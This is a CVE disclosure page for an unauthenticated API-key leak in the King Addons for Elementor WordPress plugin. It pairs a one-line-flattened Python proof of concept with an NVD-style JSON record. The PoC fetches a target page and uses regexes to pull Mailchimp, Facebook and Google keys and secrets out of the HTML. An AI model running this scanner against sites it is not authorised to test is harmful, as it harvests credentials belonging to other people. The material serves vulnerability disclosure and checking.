CVE-2025-13997

import requests import re def check_vulnerability(url): """ PoC to check for CVE-2025-13997. Fetches the HTML source and looks for exposed API keys. """ try: response = requests.get(url, timeout=10) if response.status_code == 200: content = response.text # Common patterns for API keys in the source code patterns = { 'Mailchimp': r'mailchimp[_-]?api[_-]?key["\']?\s*[:=]\s*["\']?([a-zA-Z0-9-]+)', 'Facebook': r'fb[_-]?app[_-]?secret["\']?\s*[:=]\s*["\']?([a-zA-Z0-9]+)', 'Google': r'google[_-]?api[_-]?key["\']?\s*[:=]\s*["\']?([a-zA-Z0-9-_]+)' } found = False for service, pattern in patterns.items(): match = re.search(pattern, content, re.IGNORECASE) if match: print(f"[+] Potential {service} API Key found: {match.group(1)}") found = True if not found: print("[-] No exposed API keys detected in the HTML source.") else: print(f"[-] HTTP Error: {response.status_code}") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": target_url = "http://target-site.com/page-with-form" check_vulnerability(target_url)

{"cve": {"id": "CVE-2025-13997", "sourceIdentifier": "[email protected]", "published": "2026-03-23T07:16:05.003", "lastModified": "2026-04-24T16:32:53.997", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The King Addons for Elementor – 4,000+ ready Elementor sections, 650+ templates, 70+ FREE widgets for Elementor plugin for WordPress is vulnerable to unauthenticated API key disclosure in all versions up to, and including, 51.1.49 due to the plugin adding the API keys to the HTML source code via render_full_form function. This makes it possible for unauthenticated attackers to extract site's Mailchimp, Facebook and Google API keys and secrets.\r\nThis vulnerability requires the Premium license to be installed"}, {"lang": "es", "value": "Los King Addons para Elementor – más de 4.000 secciones de Elementor listas, más de 650 plantillas, más de 70 widgets GRATUITOS para el plugin Elementor para WordPress es vulnerable a la divulgación de claves API no autenticadas en todas las versiones hasta la 51.1.49, inclusive, debido a que el plugin añade las claves API al código fuente HTML a través de la función render_full_form. Esto hace posible que atacantes no autenticados extraigan las claves y secretos API de Mailchimp, Facebook y Google del sitio. Esta vulnerabilidad requiere que la licencia Premium esté instalada."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/king-addons/tags/51.1.38/includes/widgets/Login_Register_Form/Login_Register_Form.php#L3065", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7955b162-ed0f-4455-a429-ed292771c701?source=cve", "source": "[email protected]"}]}}